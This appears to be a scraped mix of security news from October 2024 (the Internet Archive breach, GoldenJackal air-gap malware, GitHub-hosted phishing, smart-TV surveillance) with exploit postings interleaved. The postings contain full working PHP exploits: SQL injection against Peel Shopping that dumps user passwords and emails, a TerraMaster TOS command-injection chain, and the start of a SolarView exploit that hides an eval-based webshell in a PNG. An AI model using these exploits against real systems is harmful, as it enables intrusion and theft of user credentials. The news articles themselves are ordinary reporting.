A list of topics we covered in the week of October 7 to October 13 of 2024

October 10, 2024 - The Internet Archive has been hit hard by a data breach and several DDoS attacks all around the same time.

October 9, 2024 - While Google is experimenting on how its search results page looks like, we are reminded of what users need the most: indicators of confidence.

October 9, 2024 - Chatbot companion platform muah.ai was hacked and had its chatbot prompts stolen.

October 8, 2024 - Money transfer giant MoneyGram has notified customers about a data breach that has spilt sensitive customer information.

October 8, 2024 - This week on the Lock and Code podcast, we speak with Zach Hinkle and Pieter Arntz about the Facebook funeral livestream scam.

 A week in security (October 7 &#8211; October 13) 

Peel Shopping versions 2.x and below 3.1 suffer from cross site scripting and remote SQL injection vulnerabilities. This was already noted discovery in 2012 by Cyber-Crystal but this data provides more details.

    # Exploit Title: Peel Shopping "catid=" SQL injection# Google Dork: inurl:/lire/index.php?rubid=# Date: 2024-10-02# Exploit Author: Emiliano Febbi# Vendor Homepage: https://www.peel-shopping.com/# Software Link: https://github.com/advisto/peel-shopping# Version: 2.x < 3.1# Tested on: Windows 10##                                   USAGE:                                            ##                                                                                ##                                     1                                               ####If you want test this query: produit_details.php?id=1000&catid=100 you need db name. ####                                     2                                               ####If you want test this single parameter index.php?catid= leave the field with default.####                                     3                                               ####If you want test this parameter index.php?rubid= don't you need db name. (#Expl-3)   ####                                  Details:                                           ####You can also test the search module affected by XSS.                                 ####If you see many iframes are the switch of the tables or parameters;carefully use the ## ##characters '/' in the full path and '-' before the numericals vars.                  ###########################################################################################                                                                                   #########################################################################################*****************************************************************************************[code] Multiple Vulnerabilities exploit [tested]<?phpecho '<html><head><title>Peel Shopping 2.x < 3.1 "catid=" SQL injection</title></head><body><body bgcolor="black"><font color="white"><center><pre>##################################Peel Shopping 2.x < 3.1 Exploit##vuln finder!                   ##Code by Emiliano Febbi - 2024  ##################################( first get db name and later run exploit )</pre><h2>#Expl-1</h2>1 [#Query interested] -> produit_details.php?id=1000&catid=100 AND index.php?catid=<br><br><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">#Get Database Name:<font color="red"><br>(*Format: http://www.site.fr/produit_details.php?id=1000&catid=-100)</font><br><input type="text" name="victim_site"><input type="submit" value="Get!"></form><br><font color="yellow">###########################################################</font><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">[#insert victim site]:<font color="red"><br>(*Format: http://www.site.fr/produit_details.php?id=1000&catid=-100)</font> or<br><font color="lime">(*http://www.site.fr/index.php?catid=-1)</font><- DB_Name default<br><input type="text" name="victim_sitee"><br>[#insert database name]:<br><input type="text" name="victim_db" value="default"><input type="submit" value="LOAD"></form><br><font color="yellow">###########################################################</font><br><h2>#Expl-2</h2><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">#XSS Test[search_module]:<font color="red"><br>(*Format: http://www.site.fr/)</font><br><input type="text" name="site_XSS" value="http://www.site.fr/"><input type="submit" value="test!"></form><br><font color="yellow">###########################################################</font><br></font></body></center></html>';if($_POST['victim_site']) {$site = $_POST['victim_site'];print "<center><font color='red'>#DB_Name:</font>(try-1)<br>";$gettt=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--");     $tags=explode('<td class="petit">',$gettt);                    $tags=explode("</td>",$tags[1]);    $cleaning = array("performance_schema","information_schema",           "Accueil",              "Vous",               "ici",               "tes",    );            $ok = "";    $filtred = str_replace($cleaning, $ok, $tags[0]);     var_dump(strip_tags($filtred));          print "</center><br><br>";          print "<center><font color='red'>#DB_Name:</font>(try-2)<br>";$gettts=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--");     $tagss=explode('information_schema<br>',$gettts);                      $tagss=explode('" href=',$tagss[1]);          $filtreds = str_replace($cleaning, $ok, $tagss[0]);                      var_dump(strip_tags($filtreds));                                                     };;/*#exploit*/if($_POST['victim_sitee'] and $_POST['victim_db']) {$sitee = $_POST['victim_sitee']; $hack_db = $_POST['victim_db'];?><center><font color='lime'>1- #ALL @E-Mail and Users: ~table -><font color='white'>peel_utilisateurs</font></font>-> id=&catid=<br><iframe src='<? echo "$sitee"; ?>%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(<? echo "$hack_db"; ?>.peel_utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--' title='exploit' height='100' width='500'></iframe><br><font color="yellow">###########################################################</font><br><font color='lime'>2- #ALL @E-Mail and Users: ~table -><font color='white'>utilisateurs</font></font>-> id=&catid=<br><iframe src='<? echo "$sitee"; ?>%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(<? echo "$hack_db"; ?>.utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--' title='exploit' height='100' width='500'></iframe><br><font color='lime'>3- #ALL @E-Mail and Users: ~table -><font color='white'>peel_utilisateurs</font></font>-> catid=<br><iframe src='<? echo "$sitee"; ?>+union+all+select+1,mot_passe,3,4+FROM+peel_utilisateurs--' title='exploit' height='100' width='500'></iframe></center><?print "<center><font color='red'>[emails cracked]+md5:</font><br>";$textt=file_get_contents("$sitee+%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM($hack_db.peel_utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--");$ress = preg_match_all("/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i",$textt,$matchess);if ($ress) {foreach(array_unique($matchess[0]) as $emails) {echo $emails . "<br />";}}else {echo "No emails found.";}};;;/*#exploit*/echo '<center><h2>#Expl-3</h2><br><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">independent -> #try again to hack!:</font><font color="red"><br>(*Format: http://www.site.fr)</font><br><input type="text" name="hack2" value="http://www.site.fr"><br><input type="submit" value="LOAD"></center><br>';if($_POST['hack2']) {$hackk = $_POST['hack2'];echo '<center><br><font color="yellow">###########################################################</font><br>';           echo "2 [#Query interested] -> index.php?rubid=<br><font color='red'>#password1:</font>(try-1)<br>";?><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe,3+FROM+peel_utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><font color='red'>#password2:</font>(try-2)<br><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe,3+FROM+utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><font color='red'>#password3:</font>(try-3)<br><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe+FROM+peel_utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><font color='red'>#password4:</font>(try-4)<br><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe+FROM+utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><?print "<font color='red'>[emails cracked]:</font><br>";$text=file_get_contents("$hackk/index.php?rubid=-1+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,email,3%20FROM%20peel_utilisateurs--");$res = preg_match_all("/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i",$text,$matches);if ($res) {foreach(array_unique($matches[0]) as $email) {echo $email . "<br />";}}else {echo "No emails found.";}};;;;;/*#exploit*/if($_POST['site_XSS']) {$XSS = $_POST['site_XSS'];?><center><iframe src='<? echo "$XSS"; ?>recherche.php?start=0&motclef=<script>alert("XSS vulnerable!")</script>' title='exploit3' height='100' width='500'></iframe></center><br><?};;;;?>[/code]

Peel Shopping 2.x Cross Site Scripting / SQL Injection

Plus: New details emerge in the National Public Data breach, Discord gets blocked in Russia and Turkey over alleged illegal activity on the platform, and more.

The Internet Archive is under attack. On top of multiple extinction-threatening lawsuits against the organization that created and maintains the Wayback Machine, hackers this week breached the Internet Archive, stole 31 million user account details, and defaced its website—all while archive.org struggled to stay online thanks to a barrage of distributed denial-of-service attacks. As of Friday, the site remained “temporarily offline.”

In a dark twist of fate, a judge this week cleared the way for the US Treasury Department to take possession of 69,000 bitcoins stolen from the Silk Road dark web market; meanwhile, the former IRS investigator who personally seized the bitcoins, Tigran Gambaryan, remains in a Nigerian jail cell on charges related to the actions of his current employer, embattled crypto exchange Binance. Members of Congress and other officials have called for the US government to do more to ensure Gambaryan’s release given his direct role in a series of major criminal cases and in pioneering crypto-investigation techniques. As for those seized Silk Road bitcoins, they are now worth $4.4 billion and will likely be auctioned off.

Security researchers this week detailed a pernicious malware that worms its way into Linux machines and uses a variety of techniques to evade detection. Dubbed Perfctl, the malware hides itself by creating files that match those typically found within Linux instances, using tricks to prevent admin tools from recording its activities, and more. All of this is done with the goal of remaining on an infected machine to keep carrying out a variety of malicious activities. Researchers estimate that millions of Linux devices could be vulnerable.

Finally, we dissected the ways in which Google’s decision to _not_ kill third-party tracking cookies in its Chrome browser could continue to impact your privacy.

And that’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

Police use of honeypots to catch cybercriminals red-handed is nothing new. But creating an entirely new cryptocurrency to catch pump-and-dump schemers? Now that’s something special. The US Department of Justice revealed this week that the FBI made a new Ethereum-based crypto token, NexFundAI, specifically to trick people who manipulate crypto markets and take them down.

While the investigation ultimately resulted in charges against 18 people and other entities for alleged fraud and crypto market manipulation, the blast radius of the scheme also impacted some regular retail investors who are not accused of any crimes, although US officials did not provide details about those investments. A US prosecutor involved in the case told reporters, however, that the investigation netted a total of $25 million in funds, which will be returned to investors. Trading on NexFundAI has since been disabled.

**National Public Data Files for Bankruptcy After Catastrophic Breach**

National Public Data, a data broker based in Florida, is having a bad year. In August, hackers published 2.9 billion records stolen from NPD last December that included names, mailing addresses, phone numbers, email addresses, and Social Security numbers—a giant trove the hackers claim impacted “the entire population of USA, CA, and UK.” Then came the inevitable lawsuits against NPD, which is now filing for bankruptcy. Those proceedings have revealed new details, including the fact that NPD is run by a single person, Salvatore Verini, Jr, who operated the business out of his home on around $2,500 worth of equipment. A document filed in a bankruptcy court by one of NPD’s debtors states that the breach may have impacted “hundreds of millions” of people.

**Russia and Turkey Block Discord**

Discord users in Russia and Turkey this week found they were suddenly unable to connect to the online chat application. Authorities in both countries later revealed that Discord had been blocked for allegedly facilitating illegal activity. Russia’s internet regulator, Roskomnadzor, said in a statement the block “is necessary to prevent the use of the messenger for terrorist and extremist purposes, the recruitment of citizens for their commission, the sale of drugs, in connection with the placement of illegal information.” Turkish authorities, meanwhile, banned the messaging app after a court decision involving child abuse material that was allegedly hosted on Discord servers. According to BleepingComputer, some Discord users in those countries were able to access the app using a VPN that routed their connections through foreign IP addresses—potentially good news for Russian troops who were reportedly disrupted by the block.

**Police Secretly Use Face Recognition Tech to Link People to Crimes**

Law enforcement use of face recognition technology to pin crimes on Americans is far more widespread than previously known, according to a newly published investigation by The Washington Post. Records obtained by the Post found that police in 15 states used face recognition tools in “more than 1,000 investigations over the past four years.” Despite its apparent widespread use, police departments frequently seek to hide their use of the technology, which has been found to inaccurately identify people who are then charged with crimes they did not commit. As an assistant public defender in Minnesota told Post reporters, police likely obscure their use of face recognition because they “want to avoid the litigation surrounding reliability of the technology.”

The FBI Made a Crypto Coin Just to Catch Fraudsters

It's hard enough creating one air-gap-jumping tool. Researchers say the group GoldenJackal did it twice in five years.

Researchers have unearthed two sophisticated tool sets that a nation-state hacking group—possibly from Russia—used to steal sensitive data stored on air-gapped devices, meaning those that are deliberately isolated from the internet or other networks to safeguard them from malware.

One of the custom tool collections was used starting in 2019 against a South Asian embassy in Belarus. A largely different tool set created by the same threat group infected a European Union government organization three years later. Researchers from ESET, the security firm that discovered the toolkits, said some of the components in both were identical to those fellow security firm Kaspersky described in research published last year and attributed to an unknown group, tracked as GoldenJackal, working for a nation-state. Based on the overlap, ESET has concluded that the same group is behind all the attacks observed by both firms.

**Quite Unusual**

The practice of air gapping is typically reserved for the most sensitive networks or devices connected to them, such as those used in systems for voting, industrial control, manufacturing, and power generation. A host of malware used in espionage hacking over the past 15 years (for instance, here and here) demonstrate that air gapping isn’t a foolproof protection. It nonetheless forces threat groups to expend significant resources that are likely obtainable only by nation-states with superior technical acumen and unlimited budgets. ESET’s discovery puts GoldenJackal in a highly exclusive collection of threat groups.

“With the level of sophistication required, it is quite unusual that in five years, GoldenJackal managed to build and deploy not one but two separate tool sets designed to compromise air-gapped systems,” ESET researcher Matías Porolli wrote in Tuesday’s report. “This speaks to the resourcefulness of the group.”

The evolution of the kit from 2019 and the one from three years later underscores a growing sophistication by GoldenJackal developers. The first generation provided a full suite of capabilities, including:

*   GoldenDealer, a component that delivers malicious executables to air-gapped systems over USB drives
*   GoldenHowl, a backdoor that contains various modules for a mix of malicious capabilities
*   GoldenRobo, a file collector and exfiltrator

Within a few weeks of deploying the kit in 2019, ESET said, GoldenJackal started using other tools on the same compromised devices. The newer tools, which Kaspersky documented in its 2023 research, included:

*   A backdoor tracked under the name JackalControl
*   JackalSteal, a file collector and exfiltrator
*   JackalWorm, used to propagate other JackalControl and other malicious components over USB drives

GoldenJackal, ESET said, continued using these tools into January of this year. The basic flow of the attack is, first, infecting an internet-connected device through a means ESET and Kaspersky have been unable to determine. Next, the infected computer infects any external drives that get inserted. When the infected drive is plugged into an air-gapped system, it collects and stores data of interest. Last, when the drive is inserted into the internet-connected device, the data is transferred to an attacker-controlled server.

**Building a Better Trap**

In the 2022 attack on the European Union governmental organization, GoldenJackal began using a new custom toolkit. Written in multiple programming languages, including Go and Python, the newer version took a much more specialized approach. It assigned different tasks to different types of infected devices and marshaled a much larger array of modules, which could be mixed and matched based on the attacker objects for different infections.

“In the observed attacks, GoldenJackal started to use a highly modular approach, using various components to perform different tasks,” ESET’s Porolli wrote. “Some hosts were abused to exfiltrate files, others were used as local servers to receive and distribute staged files or configuration files, and others were deemed interesting for file collection, for espionage purposes.”

The figure below classifies some of the components specifically:

*   GoldenUsbCopy, which monitors for the insertion of USB drives on air-gapped devices and, when found, copies them to an encrypted container that is stored on disk
*   GoldenUsbGo, which appears to be an updated version of GoldenUSBCopy
*   GoldenAce, a distribution tool for propagating other malicious executables and retrieving files stored on USB drives
*   HTTP server, an HTTP server whose precise function isn’t well understood
*   ​​GoldenBlacklist, which downloads an encrypted archive from a local server, sifts through received email messages for those of interest, and puts them in an archive for some other component to exfiltrate
*   GoldenPyBlacklist, a Python implementation of GoldenBlacklist
*   GoldenMailer, which, when connected to an internet device, exfiltrates files of interest previously stolen from an air-gapped device. The exfiltration occurs by attaching them to emails sent to an attacker-controlled email address
*   GoldenDrive, a separate exfiltration tool that, in contrast to GoldenMailer, uploads files of interest to Google Drive.

The newly discovered toolkit is composed of many different building blocks, written in multiple languages and capabilities. The overall goal appears to be increased flexibility and resiliency in the event one module is detected by the target.

“Their goal is to get hard to obtain data from air-gapped systems and stay under the radar as much as possible,” Costin Raiu, a researcher who worked at Kaspersky at the time it was researching GoldenJackal, wrote in an interview. “Multiple exfiltration mechanisms indicate a very flexible tool kit that can accommodate all sorts of situations. These many tools indicate it’s a highly customizable framework where they deploy exactly what they need as opposed to a multi purpose malware that can do anything.”

Other new insights offered by the ESET research is GoldenJackal’s interest in targets located in Europe. Kaspersky researchers detected the group targeting Middle Eastern countries.

Based on the information that was available to Kaspersky, company researchers couldn’t attribute GoldenJackal to any specific country. ESET has also been unable to definitively identify the country, but it did find one hint that the threat group may have a tie to Turla, a potent hacking group working on behalf of Russia’s FSB intelligence agency. The tie comes in the form of command-and-control protocol in GoldenHowl referred to as transport\_http. The same expression is found in malware known to originate with Turla.

Raiu said the highly modular approach is also reminiscent of Red October, an elaborate espionage platform discovered in 2013 targeting hundreds of diplomatic, governmental, and scientific organizations in at least 39 countries, including the Russian Federation, Iran, and the United States.

While much of Tuesday’s report contains technical analysis that is likely to be too advanced for many people to understand, it provides important new information that furthers insights into malware designed to jump air gaps and the tactics, techniques, and procedures of those who use it. The report will also be useful to people responsible for safeguarding the types of organizations most frequently targeted by nation-state groups.

“I’d say this is mostly interesting for security people working in embassies and government CERTs,” Raiu said. “They need to check for these TTPs and keep an eye on them in the future. If you were previously a victim of Turla or Red October I’d keep an eye on this.”

_This story originally appeared on_ _Ars Technica._

A Mysterious Hacking Group Has 2 New Tools to Steal Data From Air-Gapped Machines

A new tax-themed malware campaign targeting insurance and finance sectors has been observed leveraging GitHub links in phishing email messages as a way to bypass security measures and deliver Remcos RAT, indicating that the method is gaining traction among threat actors.
"In this campaign, legitimate repositories such as the open-source tax filing software, UsTaxes, HMRC, and InlandRevenue were

A new tax-themed malware campaign targeting insurance and finance sectors has been observed leveraging GitHub links in phishing email messages as a way to bypass security measures and deliver Remcos RAT, indicating that the method is gaining traction among threat actors.

"In this campaign, legitimate repositories such as the open-source tax filing software, UsTaxes, HMRC, and InlandRevenue were used instead of unknown, low-star repositories," Cofense researcher Jacob Malimban said.

"Using trusted repositories to deliver malware is relatively new compared to threat actors creating their own malicious GitHub repositories. These malicious GitHub links can be associated with any repository that allows comments."

Central to the attack chain is the abuse of GitHub infrastructure for staging the malicious payloads. One variation of the technique, first disclosed by OALABS Research in March 2024, involves threat actors opening a GitHub issue on well-known repositories and uploading to it a malicious payload, and then closing the issue without saving it.

In doing so, it has been found that the uploaded malware persists even though the issue is never saved, a vector that has become ripe for abuse as it allows attackers to upload any file of their choice and not leave any trace except for the link to the file itself.

The approach has been weaponized to trick users into downloading a Lua-based malware loader that is capable of establishing persistence on infected systems and delivering additional payloads, as detailed by Morphisec this week.

The phishing campaign detected by Cofense employs a similar tactic, the only difference being that it utilizes GitHub comments to attach a file (i.e., the malware), after which the comment is deleted. Like in the aforementioned case, the link remains active and is propagated via phishing emails.

"Emails with links to GitHub are effective at bypassing SEG security because GitHub is typically a trusted domain," Malimban said. "GitHub links allow threat actors to directly link to the malware archive in the email without having to use Google redirects, QR codes, or other SEG bypass techniques."

The development comes as Barracuda Networks revealed novel methods adopted by phishers, including ASCII- and Unicode-based QR codes and blob URLs as a way to make it harder to block malicious content and evade detection.

"A blob URI (also known as a blob URL or an object URL) is used by browsers to represent binary data or file-like objects (called blobs) that are temporarily held in the browser's memory," security researcher Ashitosh Deshnur said.

"Blob URIs allow web developers to work with binary data like images, videos, or files directly within the browser, without having to send or retrieve it from an external server."

It also follows new research from ESET that the threat actors behind the Telekopye Telegram toolkit have expanded their focus beyond online marketplace scams to target accommodation booking platforms such as Booking.com and Airbnb, with a sharp uptick detected in July 2024.

The attacks are characterized by the use of compromised accounts of legitimate hotels and accommodation providers to contact potential targets, claiming purported issues with the booking payment and tricking them into clicking on a bogus link that prompts them to enter their financial information.

"Using their access to these accounts, scammers single out users who recently booked a stay and haven't paid yet – or paid very recently – and contact them via in-platform chat," researchers Jakub Souček and Radek Jizba said. "Depending on the platform and the Mammoth's settings, this leads to the Mammoth receiving an email or SMS from the booking platform."

"This makes the scam much harder to spot, as the information provided is personally relevant to the victims, arrives via the expected communication channel, and the linked, fake websites look as expected."

What's more, the diversification of the victimology footprint has been complemented by improvements to the toolkit that allow the scammer groups to speed up the scam process using automated phishing page generation, improve communication with targets via interactive chatbots, protecting phishing websites against disruption by competitors, and other goals.

Telekopye's operations have not been without their fair share of hiccups. In December 2023, law enforcement officials from Czechia and Ukraine announced the arrest of several cybercriminals who are alleged to have used the malicious Telegram bot.

"Programmers created, updated, maintained and improved the functioning of Telegram bots and phishing tools, as well as ensuring the anonymity of accomplices on the internet and providing advice on concealing criminal activity," the Police of the Czech Republic said in a statement at the time.

"The groups in question were managed, from dedicated workspaces, by middle-aged men from Eastern Europe and West and Central Asia," ESET said. "They recruited people in difficult life situations, through job portal postings promising 'easy money,' as well as by targeting technically skilled foreign students at universities."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GitHub, Telegram Bots, and QR Codes Abused in New Wave of Phishing Attacks

The Center for Digital Democracy calls on the FTC, the FCC, and California regulators to look at connected TV practices.

Your television is debuting the latest, most captivating program: You.

In a report titled “How TV Watches Us: Commercial Surveillance in the Streaming Era,” the Center for Digital Democracy (CDD) spotlighted a massive data-driven surveillance apparatus that ensnares the public through modern television sets.

> “The widespread technological and business developments that have taken place during the last five years have created a connected television media and marketing system with unprecedented capabilities for surveillance and manipulation.”

In cooperation with data brokers, streaming video programming networks, Connected Television (CTV) device companies, and smart TV manufacturers are creating detailed digital dossiers about viewers, based on a person’s identity information, viewing choices, purchasing patterns, and thousands of online and offline behaviors.

Because of their findings, the CDD has called on the Federal Trade Commission (FTC), the Federal Communications Commission (FCC), and California Regulators to investigate connected TV practices.

The report provides a detailed overview of all the different ways in which streaming services and streaming hardware target viewers in ways that are severe privacy infringements.

Earlier, we read a paper by researchers of the Cornell University about a tracking approach called Automatic Content Recognition (ACR). ACR is a technology that periodically captures the content displayed on a TV’s screen and matches it against a content library to detect what content is being displayed at any given point in time.

The researchers found that ACR is functional even when the smart TV is used as a “dumb” external display. There are two types of ACR fingerprinting: one to process acoustic (ACR audio) media, and one for video content (ACR Video).

Brands utilize ACR TV for multiple reasons. The most obvious are frequency optimization, unique reach abilities, and improved targeting. With the advent of CTV, more and more people are opting out of cable television, which opens the opportunity of more targeted advertising to reach a specific audience.

Free Advertiser-Supported TV (FAST channels) such as Tubi, Pluto TV, and many others are commonplace, and present advertisers with a key opportunity to monetize viewer data and target them with sophisticated new forms of interactive marketing.

CTV has unleashed a powerful arsenal of interactive advertising techniques, including virtual product placement inserted into programming and altered in real time. CTV companies operate cutting-edge advertising technologies that gather, analyze, and then target consumers with ads, delivering them to households in the blink of an eye. These can be hyper targeted advertisements which are personalized for individual viewers.

The report profiles major players in the connected TV industry, along with the wide range of technologies they use to monitor and target viewers. Some household names you might be interested in include:

*   Disney(+)
*   Netflix
*   Amazon
*   Roku
*   Vizio
*   Comcast (NBCU)
*   LG
*   Samsung
*   Google (YouTube)

> “Many of these entities offer misleading and disingenuous ‘privacy policies’ and self-serving descriptions of their systems that fail to explain the complex processes they use to extract data from consumers, track viewing and other behaviors, and facilitate targeted marketing.”

Combine the data these companies are gathering about us with other information that data brokers possess, and you are way past anything we should find acceptable.

Experian offers “over 240 politically relevant audience” segments for sale, based on a detailed set of criteria, including “audience interactions, preferences, demographics, behaviors, location, income and more.”

The US market, which is one of only two that allow direct-to-consumer advertising of pharmaceutical products, is seeing marketers for pharmaceutical products that are heavily invested in connected TV advertising.

Industry research shows that families with young children tend to watch more streaming TV content. Children and teens play a powerful role in determining the viewing patterns of their families, serving as decision-makers when it comes to streaming content. Disney Advertising even calls the cohorts of children, teens and adults viewing its Disney+ and other content “Generation Stream.”

Report co-author Kathryn C. Montgomery, Ph.D. stated:

> “Policy makers, scholars, and advocates need to pay close attention to the changes taking place in today’s 21st century television industry. In addition to calling for strong consumer and privacy safeguards, we should seize this opportunity to re-envision the power and potential of the television medium and to create a policy framework for connected TV that will enable it to do more than serve the needs of advertisers. Our future television system in the United States should support and sustain a healthy news and information sector, promote civic engagement, and enable a diversity of creative expression to flourish.”

**Personal Data Remover**

It may feel like keeping your sensitive data away from data brokers is a losing fight, but there are ways to stop those data brokers from collecting new information and, where possible, to have it deleted from their rosters. For people in the United States, Malwarebytes Personal Data Remover provides:   

*   Immediate, deep scans across roughly 175 databases to find your personal data. 
*   Personalized, in-depth reports on what data is being sold and who is selling it.  
*   Automatic data removal requests for subscribers, which can save 300+ hours of manual work in wiping sensitive details off the internet, along with free DIY guides to tackle each site individually.  
*   Recurring scans and data removal requests that will make it harder for invasive websites to rebuild their digital portraits of you.

 Modern TVs have &#8220;unprecedented capabilities for surveillance and manipulation,&#8221; group reveals 

TerraMaster TOS version 4.2.29 suffers from a remote code injection vulnerability leveraging a local file inclusion vulnerability.

    =============================================================================================================================================| # Title     : TerraMaster TOS 4.2.29 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.terra-master.com/global/alltos/                                                                                 |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 138 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass TerraMasterExploit{    private $targetUri;    private $data = [];    private $terramaster = [];    public function __construct($targetUri)    {        $this->targetUri = rtrim($targetUri, '/') . '/';    }    public function getData()    {        // Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`        $response = $this->sendRequest('POST', 'module/api.php?mobile/webNasIPS', ['User-Agent' => 'TNAS']);                if ($response && strpos($response, 'webNasIPS successful') !== false) {            // Parse the JSON response and get the data            $resJson = json_decode($response, true);            if (!empty($resJson['data'])) {                $this->data['password'] = trim(explode('SAT', explode('PWD:', $resJson['data'])[1])[0]);                $this->data['mac'] = trim(explode('"', explode('mac":"', $resJson['data'])[1])[0]);                $this->data['key'] = substr($this->data['mac'], 6, 6); // last three MAC address entries                $this->data['timestamp'] = time();                // derive signature                $this->data['signature'] = $this->tosEncryptStr($this->data['key'], $this->data['timestamp']);            }        }    }    private function tosEncryptStr($key, $strToEncrypt)    {        $id = $key . $strToEncrypt;        return md5($id);    }    public function executeCommand($cmd)    {        // Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`        $diskstring = $this->generateRandomString(4, 8);        $headers = [            'User-Agent' => 'TNAS',            'Authorization' => $this->data['password'],            'Signature' => $this->data['signature'],            'Timestamp' => $this->data['timestamp']        ];        $this->sendRequest('POST', 'module/api.php?mobile/createRaid', [            'raidtype' => ';' . $cmd,            'diskstring' => $diskstring        ], $headers);    }    public function getTerramasterInfo()    {        // get Terramaster CPU architecture and TOS version        $response = $this->sendRequest('GET', 'tos/index.php?user/login');        if ($response) {            preg_match('/ver=.+?"/', $response, $matches);            if ($matches) {                $version = $matches[0];                // check if architecture is ARM64 or X64                if (strpos($version, '_A') !== false) {                    $this->terramaster['cpu_arch'] = 'ARM64';                } elseif (strpos($version, '_S') !== false || strpos($version, '_Q') !== false) {                    $this->terramaster['cpu_arch'] = 'X64';                } else {                    $this->terramaster['cpu_arch'] = 'UNKNOWN';                }                // strip TOS version number and remove trailing double quote.                $this->terramaster['tos_version'] = rtrim(substr($version, strpos($version, '.0_') + 3), '"');            }        }    }    public function check()    {        $this->getTerramasterInfo();        if (empty($this->terramaster)) {            return 'Safe';        }        if (version_compare($this->terramaster['tos_version'], '4.2.29', '<=') === 0) {            return "Vulnerable: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";        }        return "Safe: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";    }    public function exploit()    {        $this->getData();        if (empty($this->data)) {            throw new Exception('Cannot retrieve the leaked data.');        }        echo "Executing exploit...\n";        // Example command to execute        $this->executeCommand('whoami'); // Replace 'whoami' with desired command    }    private function sendRequest($method, $uri, $data = [], $headers = [])    {        $url = $this->targetUri . $uri;        $options = [            CURLOPT_RETURNTRANSFER => true,            CURLOPT_CUSTOMREQUEST => strtoupper($method),            CURLOPT_HTTPHEADER => array_merge(['Content-Type: application/x-www-form-urlencoded'], $headers)        ];        if (strtoupper($method) === 'POST') {            $options[CURLOPT_POSTFIELDS] = http_build_query($data);        } else {            $options[CURLOPT_URL] = $url;        }        $ch = curl_init();        curl_setopt_array($ch, $options);        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    private function generateRandomString($minLength, $maxLength)    {        $length = rand($minLength, $maxLength);        return substr(str_shuffle(str_repeat("ABCDEFGHIJKLMNOPQRSTUVWXYZ", $maxLength)), 0, $length);    }}// Usage$exploit = new TerraMasterExploit('http://target-terramaster-url.com');$check = $exploit->check();echo $check . "\n";if (strpos($check, 'Vulnerable') !== false) {    $exploit->exploit();}Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

TerraMaster TOS 4.2.29 Code Injection / Local File Inclusion

SolarView Compact version 6.00 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : SolarView Compact 6.00 Code Injection Vulnerability                                                                         |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.contec.com/                                                                                                     |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 112 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class SolarViewExploit {  
    private $targetUri;  
    private $webshellName;  
    private $postParam;  
    private $timeout;

    public function __construct($targetUri, $timeout = 40) {  
        $this->targetUri = rtrim($targetUri, '/');  
        $this->timeout = $timeout;  
    }

    public function uploadWebshell($webshell = null) {  
        // Randomize file name if option WEBSHELL is not set  
        $this->webshellName = $webshell ?? $this->generateRandomFileName();

        $this->postParam = $this->generateRandomString(8);

                // Inject PHP payload into the PLTE chunk of a PNG image to hide the payload  
        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";  
        $pngWebshell = $this->injectPhpPayloadPng($phpPayload);

